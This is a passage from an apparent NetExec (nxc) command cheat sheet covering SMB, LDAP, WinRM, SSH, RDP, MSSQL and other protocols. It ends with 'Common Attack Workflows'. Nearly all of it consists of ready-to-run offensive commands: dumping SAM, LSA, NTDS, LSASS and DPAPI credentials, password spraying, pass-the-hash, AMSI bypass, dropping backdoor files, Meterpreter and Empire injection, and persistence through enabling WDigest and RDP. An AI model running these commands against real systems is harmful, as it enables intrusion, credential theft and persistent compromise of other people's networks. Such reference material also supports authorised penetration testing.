computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups        # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol            # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions        # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks               # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces          # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users      # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute           # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta             # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist            # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content       # Search file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3       # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files    # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\"                    # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable'           # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\"       # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs          # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32            # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode             # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts                   # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --sam regdump                # Using regdump\n\n# LSA Secrets\nnxc smb 192.168.1.10 -u admin -p pass --lsa                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump                # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds                  # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss              # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi          # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin     # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled        # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi                      # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies              # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem             # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm                       # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi                   # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass --sccm disk                  # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010                   # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon                  # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac                      # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare             # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic                 # CVE-2019-1040\nnxc smb 192.168.1.10 -u user -p pass -M smbghost                   # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M coerce_plus                # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast                  # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av                    # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca                    # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav                     # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus                # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password               # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin              # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc                    # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy                     # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky                     # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer               # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator            # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy                    # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump                  # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump                  # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz                # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash                # DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider               # Recursive LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil                  # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover          # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger           # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm                 # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng                 # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty                     # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman                    # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp                    # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc                       # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi                      # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam                     # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol                      # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb             # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam                       # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host               # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis                       # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated          # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1                    # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M runasppl                  # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac                       # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc                       # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions        # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++                 # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history        # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files              # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped                   # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec               # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject                # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery              # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate               # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi                        # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as                # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp                 # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable  # Enable WDigest\nnxc smb 192.168.1.10 -u admin -p pass -M remote-uac                # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query                 # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon              # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection           # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users           # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123   # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups          # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers       # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list         # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid         # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count               # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation    # Trusted delegation\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required     # Empty passwords allowed\nnxc ldap 192.168.1.10 -u user -p pass --active-users              # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation           # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa                       # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting & ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs                      # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread                  # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts               # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer             # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users            # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network               # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword      # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword          # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership           # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps                      # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker              # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq                       # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete                  # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k                     # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso                       # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm                      # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets                   # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc                 # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami                    # Current user details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps                     # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985                # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986                # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986           # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http         # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https        # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https   # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15          # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam                      # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa                      # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd          # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell   # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass --ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check                  # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot             # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN -k              # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\"                 # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host'               # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute                  # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate        # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins             # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link            # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp          # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M link_xpcmd              # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce            # Execute arbitrary SQL\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv              # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec               # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links                # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject                # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump                  # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection           # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery              # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls                        # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5               # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## NFS Protocol (Port 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10                                               # Basic enumeration\nnxc nfs 192.168.1.10 --shares                                      # List shares\nnxc nfs 192.168.1.10 --enum-shares                                 # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5                               # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls                          # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon                  # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records\nnxc wmi 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256                       # Number of threads (default: 256)\n--timeout 10                 # Connection timeout in seconds\n--jitter 5                   # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose                    # Verbose output\n--debug                      # Debug mode\n--log output.log             # Save output to file\n--no-progress                # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6                           # Force IPv6\n--dns-server 8.8.8.8         # Custom DNS server\n--dns-tcp                    # Use TCP for DNS queries\n--dns-timeout 3              # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1                        # Use credential ID from database\n-id 1 2 3                    # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https               # Use HTTPS server (default)\n--server http                # Use HTTP server\n--server-host 0.0.0.0        # Bind server to IP\n--server-port 8000           # Server port\n--connectback-host IP        # Connectback IP for remote system\n```\n\n### Database\n```bash\ncmedb                        # Access NXC database\nexport smb                   # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L                              # List all SMB modules\nnxc smb -M  --options           # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user -p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H  -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M 